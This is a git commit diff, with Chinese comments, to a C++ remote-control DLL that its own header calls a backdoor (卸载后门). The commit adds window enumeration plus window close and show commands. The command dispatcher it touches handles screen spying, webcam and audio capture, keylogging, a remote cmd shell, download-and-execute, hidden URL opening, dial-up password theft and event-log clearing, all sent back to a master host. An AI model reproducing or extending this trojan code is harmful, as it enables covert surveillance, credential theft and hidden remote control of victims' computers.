添加了服务端遍历窗口数据的代码与注释

2025-06-08 13:29:50 +00:00 · 2020-05-30 16:36:31 +08:00 · 2020-05-30 16:36:31 +08:00 · 2cee9bb467
commit 2cee9bb467
parent c95afb225a
8 changed files with 106 additions and 30 deletions
--- a/CcMainDll/.vs/CcMainDll/v15/.suo
+++ b/CcMainDll/.vs/CcMainDll/v15/.suo
--- a/CcMainDll/CcMainDll/Debug/CcMainDll.log
+++ b/CcMainDll/CcMainDll/Debug/CcMainDll.log
@ -79,8 +79,8 @@ f:\myapp\ccremote\ccmaindll\ccmaindll\common\shellmanager.cpp(52): warning C4996
  SystemManager.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\dialupass.h(62): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
  d:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(119): warning C4018: “<”: 有符号/无符号不匹配
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(137): warning C4018: “<”: 有符号/无符号不匹配
-f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(210): warning C4101: “cbNeeded”: 未引用的局部变量
+f:\myapp\ccremote\ccmaindll\ccmaindll\common\systemmanager.cpp(228): warning C4101: “cbNeeded”: 未引用的局部变量
  VideoCap.cpp
 f:\myapp\ccremote\ccmaindll\ccmaindll\common\videocap.cpp(118): warning C4101: “gCapTureParms”: 未引用的局部变量
  VideoManager.cpp
--- a/CcMainDll/CcMainDll/common/KernelManager.cpp
+++ b/CcMainDll/CcMainDll/common/KernelManager.cpp
@ -56,23 +56,23 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 	case COMMAND_ACTIVED:
 		InterlockedExchange((LONG *)&m_bIsActived, true);
 		break;
-	case COMMAND_LIST_DRIVE: // 文件管理
+	case COMMAND_LIST_DRIVE:		// 文件管理
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, 
 			(LPVOID)m_pClient->m_Socket, 0, NULL, false);
 		break;
-	case COMMAND_SCREEN_SPY: // 屏幕查看
+	case COMMAND_SCREEN_SPY:		// 屏幕查看
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL, true);
 		break;
-	case COMMAND_WEBCAM: // 摄像头
+	case COMMAND_WEBCAM:			// 摄像头
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_AUDIO: // 摄像头
+	case COMMAND_AUDIO:				// 摄像头
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_SHELL: // 远程sehll
+	case COMMAND_SHELL:				// 远程shell-CMD
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, 
 			(LPVOID)m_pClient->m_Socket, 0, NULL, true);
 		break;
@ -80,39 +80,43 @@ void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_SYSTEM: 
+	case COMMAND_SYSTEM:			// 进程
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
 	case COMMAND_WSLIST:			// 窗口
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_WindowManager,
 			(LPVOID)m_pClient->m_Socket, 0, NULL);
 		break;
-	case COMMAND_DOWN_EXEC: // 下载者
+	case COMMAND_DOWN_EXEC:			// 下载者
 		m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager,
 			(LPVOID)(lpBuffer + 1), 0, NULL, true);
-		Sleep(100); // 传递参数用
+		Sleep(100);					// 传递参数用
 		break;
-	case COMMAND_OPEN_URL_SHOW: // 显示打开网页
+	case COMMAND_OPEN_URL_SHOW:		// 显示打开网页
 		OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
 		break;
-	case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页
+	case COMMAND_OPEN_URL_HIDE:		// 隐藏打开网页
 		OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
 		break;
-	case COMMAND_REMOVE: // 卸载,
+	case COMMAND_REMOVE:			// 卸载,
 		UnInstallService();
 		break;
-	case COMMAND_CLEAN_EVENT: // 清除日志
+	case COMMAND_CLEAN_EVENT:		// 清除日志
 		CleanEvent();
 		break;
 	case COMMAND_SESSION:
 		CSystemManager::ShutdownWindows(lpBuffer[1]);
 		break;
-	case COMMAND_RENAME_REMARK: // 改备注
+	case COMMAND_RENAME_REMARK:		// 改备注
 		SetHostID(m_strServiceName, (LPCTSTR)(lpBuffer + 1));
 		break;
-	case COMMAND_UPDATE_SERVER: // 更新服务端
+	case COMMAND_UPDATE_SERVER:		// 更新服务端
 		if (UpdateServer((char *)lpBuffer + 1))
 			UnInstallService();
 		break;
-	case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包
+	case COMMAND_REPLAY_HEARTBEAT:	// 回复心跳包
 		break;
 	}	
 }
--- a/CcMainDll/CcMainDll/common/SystemManager.cpp
+++ b/CcMainDll/CcMainDll/common/SystemManager.cpp
@ -17,9 +17,17 @@
 // Construction/Destruction
 //////////////////////////////////////////////////////////////////////
-CSystemManager::CSystemManager(CClientSocket *pClient) : CManager(pClient)
+CSystemManager::CSystemManager(CClientSocket *pClient, BYTE bHow) : CManager(pClient)
 {
-	SendProcessList();
+	m_caseSystemIs = bHow;
 	if (m_caseSystemIs == COMMAND_SYSTEM)     //如果是获取进程
 	{
 		SendProcessList();
 	}
 	else if (m_caseSystemIs == COMMAND_WSLIST)   //如果是获取窗口
 	{
 		SendWindowsList();
 	}
 }
 CSystemManager::~CSystemManager()
@ -28,20 +36,26 @@ CSystemManager::~CSystemManager()
 }
 void CSystemManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
 {
 	SwitchInputDesktop();
-	switch (lpBuffer[0])
+	switch (lpBuffer[0])//这里是进程管理接收数据的函数了 判断是哪个命令
 	{
-	case COMMAND_PSLIST:
+	case COMMAND_PSLIST:				//发送进程列表
-		SendProcessList();
+		SendProcessList();	
 		break;
-	case COMMAND_WSLIST:
+	case COMMAND_WSLIST:				//发送窗口列表
 		SendWindowsList();
 		break;
-	case COMMAND_DIALUPASS:
+	case COMMAND_DIALUPASS:				//保留20200530
 		SendDialupassList();
 		break;
-	case COMMAND_KILLPROCESS:
+	case COMMAND_KILLPROCESS:			//关闭进程
 		KillProcess((LPBYTE)lpBuffer + 1, nSize - 1);
 	case COMMAND_WINDOW_CLOSE:			//关闭窗口
 		CloseTheWindow(lpBuffer + 1);	
 		break;
 	case COMMAND_WINDOW_TEST:			//最大化最小化 隐藏窗口函
 		ShowTheWindow(lpBuffer + 1);    
 		break;
 	default:
 		break;
 	}
@ -64,14 +78,18 @@ void CSystemManager::SendProcessList()
 void CSystemManager::SendWindowsList()
 {
 	UINT	nRet = -1;
 	//获取窗口列表数据
 	LPBYTE	lpBuffer = getWindowsList();
 	if (lpBuffer == NULL)
 		return;
 	//发送遍历到的窗口数据
 	Send((LPBYTE)lpBuffer, LocalSize(lpBuffer));
 	LocalFree(lpBuffer);	
 }
 //保留20200530
 void CSystemManager::SendDialupassList()
 {
 	CDialupass	pass;
@ -280,6 +298,7 @@ LPBYTE CSystemManager::getProcessList()
 	return lpBuffer;	
 }
 //提权
 bool CSystemManager::DebugPrivilege(const char *PName,BOOL bEnable)
 {
 	BOOL              bResult = TRUE;
@ -312,6 +331,7 @@ void CSystemManager::ShutdownWindows( DWORD dwReason )
 	DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);	
 }
 //窗口回调遍历所有窗口
 bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 {
 	DWORD	dwLength = 0;
@ -321,21 +341,27 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 	char	strTitle[1024];
 	memset(strTitle, 0, sizeof(strTitle));
 	//获取传进来的窗口句柄的标题
 	GetWindowText(hwnd, strTitle, sizeof(strTitle));
-	
+	//判断窗口是否可见，标题是否为空
 	if (!IsWindowVisible(hwnd) || lstrlen(strTitle) == 0)
 		return true;
-	
+	//如果指针为空的话申请一个堆
 	//（该函数时循环的所以第二次进来就不是空的，用动态的LocalReAlloc改变堆大小实现数据都在一个堆上）
 	if (lpBuffer == NULL)
 		//第一次申请大小为1是因为第一字节为通知控制端标识
 		lpBuffer = (LPBYTE)LocalAlloc(LPTR, 1);
 	dwLength = sizeof(DWORD) + lstrlen(strTitle) + 1;
 	dwOffset = LocalSize(lpBuffer);
 	//计算缓冲区大小
 	lpBuffer = (LPBYTE)LocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
 	//获取窗口的创建者 + 两个memcpy数据结构为 创建者PID + hwnd + 窗口标题 + 0
 	GetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
 	memcpy((lpBuffer + dwOffset), &hwnd, sizeof(DWORD));
 	memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, lstrlen(strTitle) + 1);
 	*(LPBYTE *)lParam = lpBuffer;
@ -343,6 +369,8 @@ bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
 	return true;
 }
 //获取窗口列表数据
 LPBYTE CSystemManager::getWindowsList()
 {
 	LPBYTE	lpBuffer = NULL;
@ -350,6 +378,27 @@ LPBYTE CSystemManager::getWindowsList()
 	//枚举屏幕上的所有的顶层窗口，轮流地将这些窗口的句柄传递给一个应用程序定义的回调函数。
 	//EnumWindows会一直进行下去，直到枚举完所有的顶层窗口，或者回调函数返回了FALSE.
 	EnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
 	//数据头填充TOKEN_WSLIST主控端识别
 	lpBuffer[0] = TOKEN_WSLIST;
 	return lpBuffer;	
 }
 //关闭窗口
 void CSystemManager::CloseTheWindow(LPBYTE buf)
 {
 	DWORD hwnd;
 	memcpy(&hwnd, buf, sizeof(DWORD));				//得到窗口句柄 
 	::PostMessage((HWND__ *)hwnd, WM_CLOSE, 0, 0);	//向窗口发送关闭消息
 }
 //显示窗口
 void CSystemManager::ShowTheWindow(LPBYTE buf)
 {
 	DWORD hwnd;
 	DWORD dHow;
 	memcpy((void*)&hwnd, buf, sizeof(DWORD));				//得到窗口句柄
 	memcpy(&dHow, buf + sizeof(DWORD), sizeof(DWORD));		//得到窗口处理参数
 	ShowWindow((HWND__ *)hwnd, dHow);
 }
--- a/CcMainDll/CcMainDll/common/SystemManager.h
+++ b/CcMainDll/CcMainDll/common/SystemManager.h
@ -14,7 +14,7 @@
 class CSystemManager : public CManager  
 {
 public:
-	CSystemManager(CClientSocket *pClient);
+	CSystemManager(CClientSocket *pClient, BYTE bHow);//bHow是传进来功能的标志
 	virtual ~CSystemManager();
 	virtual void OnReceive(LPBYTE lpBuffer, UINT nSize);
@ -22,6 +22,8 @@ public:
 	static bool CALLBACK EnumWindowsProc( HWND hwnd, LPARAM lParam);
 	static void ShutdownWindows(DWORD dwReason);
 private:
 	BYTE m_caseSystemIs;//构造函数会初始化这个变量，用于区分进程或者窗口的变量
 	BOOL GetProcessFullPath(DWORD dwPID, TCHAR pszFullPath[MAX_PATH]);
 	BOOL DosPathToNtPath(LPTSTR pszDosPath, LPTSTR pszNtPath);
 	LPBYTE getProcessList();
@ -30,6 +32,8 @@ private:
 	void SendWindowsList();
 	void SendDialupassList();
 	void KillProcess(LPBYTE lpBuffer, UINT nSize);
 	void ShowTheWindow(LPBYTE buf);
 	void CloseTheWindow(LPBYTE buf);
 };
 #endif // !defined(AFX_SYSTEMMANAGER_H__26C71561_C37D_44F2_B69C_DAF907C04CBE__INCLUDED_)
--- a/CcMainDll/CcMainDll/common/loop.h
+++ b/CcMainDll/CcMainDll/common/loop.h
@ -110,19 +110,35 @@ DWORD WINAPI Loop_KeyboardManager(SOCKET sRemote)
 	return 0;
 }
 //进程遍历回调函数
 DWORD WINAPI Loop_SystemManager(SOCKET sRemote)
 {	
 	CClientSocket	socketClient;
 	if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
 		return -1;
-	CSystemManager	manager(&socketClient);
+	CSystemManager	manager(&socketClient, COMMAND_SYSTEM);
 	socketClient.run_event_loop();
 	return 0;
 }
 //窗口线程回调函数
 DWORD WINAPI Loop_WindowManager(SOCKET sRemote)
 {
 	CClientSocket	socketClient;
 	if (!socketClient.Connect(CKernelManager::m_strMasterHost, CKernelManager::m_nMasterPort))
 		return -1;
 	CSystemManager	manager(&socketClient, COMMAND_WSLIST);
 	socketClient.run_event_loop();
 	return 0;
 }
 DWORD WINAPI Loop_DownManager(LPVOID lparam)
 {
 	int	nUrlLength;
--- a/bin/server/CcMainDll.dll
+++ b/bin/server/CcMainDll.dll
--- a/common/macros.h
+++ b/common/macros.h
@ -61,6 +61,9 @@ enum
 	COMMAND_WSLIST,					// 窗口列表
 	COMMAND_DIALUPASS,				// 拨号密码
 	COMMAND_KILLPROCESS,			// 关闭进程
 	COMMAND_WINDOW_CLOSE,			// 关闭窗口
 	COMMAND_WINDOW_TEST,			// 操作窗口
 	COMMAND_SHELL,					// cmdshell
 	COMMAND_SESSION,				// 会话管理（关机，重启，注销, 卸载）
 	COMMAND_REMOVE,					// 卸载后门